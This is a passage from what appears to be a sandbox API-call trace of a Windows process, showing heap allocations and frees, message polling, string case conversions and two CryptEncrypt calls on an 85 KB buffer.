dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0121.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0121.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0121.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0121.980] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0121.980] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.980] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa348 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0121.980] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0121.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0121.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.980] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0121.981] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0121.981] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0121.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0121.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0121.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.981] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0121.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0121.981] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.982] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.982] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0121.982] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0121.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa318, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.986] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14d04, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14d08) returned 1 [0121.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.987] CharLowerBuffW (in: lpsz="byte[85256]", cchLength=0xb | out: lpsz="byte[85256]") returned 0xb [0121.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.993] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.993] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.993] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.993] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.993] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.995] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x14d04, dwBufLen=0x14d08 | out: pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x14d08) returned 1 [0121.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 